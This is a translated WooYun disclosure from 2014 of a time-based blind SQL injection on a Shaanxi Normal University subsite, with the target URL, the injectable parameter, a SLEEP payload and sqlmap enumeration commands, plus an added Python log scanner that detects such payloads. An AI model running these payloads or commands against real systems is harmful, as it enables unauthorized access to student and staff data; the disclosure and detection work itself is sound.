
Vulnerability Summary

Defect ID: wooyun-2014-061071

Title: SQL injection on a subsite of Shaanxi Normal University

Vendor: Shaanxi Normal University

Author: 从容

Submitted: 2014-05-19 11:31

Fixed: 2014-07-03 11:32

Published: 2014-07-03 11:32

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 8

Status: Handed over to a third-party partner organization (CCERT, the China Education and Research Network emergency response group) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:


Vulnerability Details

Disclosure status:

2014-05-19: Details sent to the vendor, awaiting the vendor's response
2014-05-23: Vendor confirmed; details visible to the vendor only
2014-06-02: Details disclosed to core white hats and relevant domain experts
2014-06-12: Details disclosed to regular white hats
2014-06-22: Details disclosed to intern white hats
2014-07-03: Details disclosed to the public

Brief description:

A MySQL injection on a subsite of Shaanxi Normal University leaks a large amount of sensitive database information,
including administrator user IPs, student data, server information, configuration file contents and much more; just enumerating the tables took over an hour - -.
Main site:
http://www.snnu.edu.cn/

Details:

MySQL injection point:

http://xiaobao.snnu.edu.cn/bencandy.php?id=965


---
Place: GET
Parameter: id
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=965' AND SLEEP(5) AND 'TCGQ'='TCGQ
---
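The time-based blind payload sqlmap reports above (`SLEEP(5)` appended to the `id` parameter) leaves a recognizable trace in the web server's access log even though the application's responses reveal nothing. The following Python detector is an added example and not part of the original report: it scans constructed Apache-style log lines (the client address 203.0.113.5 and the timestamps are assumptions) for delay functions and for non-numeric values in a parameter the application treats as an integer, decoding the query string twice so double-encoded variants are also caught.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlparse

# Delay primitives used by time-based blind SQL injection (MySQL, PostgreSQL, MSSQL, Oracle).
TIME_FUNCS = re.compile(r"\b(sleep|benchmark|pg_sleep|waitfor\s+delay|dbms_pipe\.receive_message)\b", re.I)
# Parameters the application treats as integers; anything else in them deserves a look.
NUMERIC_PARAMS = {"id"}
# Apache/nginx "combined"-style access log line; only the client IP and request path are used.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*" \d{3} \S+')


def suspicious_params(request_path):
    """Return (param, decoded_value, reasons) for query parameters that look like
    time-based blind SQL injection attempts."""
    findings = []
    for name, once in parse_qsl(urlparse(request_path).query, keep_blank_values=True):
        value = unquote_plus(once)  # second decode catches double-URL-encoded payloads
        reasons = []
        if TIME_FUNCS.search(value):
            reasons.append("time-delay function")
        if name in NUMERIC_PARAMS and not value.isdigit():
            reasons.append("non-numeric value in numeric parameter")
        if reasons:
            findings.append((name, value, "; ".join(reasons)))
    return findings


def scan_log(lines):
    """Return (client_ip, param, decoded_value, reasons) for every suspicious request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue
        for name, value, reasons in suspicious_params(m.group("path")):
            hits.append((m.group("ip"), name, value, reasons))
    return hits


# Constructed sample lines: a normal request, the report's payload URL-encoded, and a
# double-encoded variant. 203.0.113.5 is a documentation address, not a real client.
SAMPLE_LOG = [
    '203.0.113.5 - - [19/May/2014:11:20:01 +0800] "GET /bencandy.php?id=965 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [19/May/2014:11:20:07 +0800] "GET /bencandy.php?id=965%27%20AND%20SLEEP%285%29'
    '%20AND%20%27TCGQ%27%3D%27TCGQ HTTP/1.1" 200 5120',
    '203.0.113.5 - - [19/May/2014:11:20:15 +0800] "GET /bencandy.php?id=965%2527%2520AND%2520SLEEP'
    '%25285%2529%2523 HTTP/1.1" 200 5120',
]
```

Running `scan_log(SAMPLE_LOG)` flags the second and third lines and leaves the plain `id=965` request alone; in practice the same check belongs on the decoded query string at the WAF or in SIEM parsing, and the application-side fix is to cast `id` to an integer or bind it as a prepared-statement parameter.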

Proof of vulnerability:

#1. Enumerate databases:

./sqlmap.py -u "http://xiaobao.snnu.edu.cn/bencandy.php?id=965" --dbs


available databases [1]:
[*] xiaocao


#2. Enumerate tables:

./sqlmap.py -u "http://xiaobao.snnu.edu.cn/bencandy.php?id=965" -D xiaocao --tables


There are too many tables to list them all - -.


There are even more columns - -.
Not showing them one by one - -.

Fix:

:)

Copyright notice: please credit 从容@乌云 (WooYun) when reposting.


Vulnerability Response

Vendor response:

Severity: Medium

Vulnerability Rank: 7

Confirmed: 2014-05-23 14:45

Vendor reply:

The affected school has been notified to handle it.

Latest status:

None yet
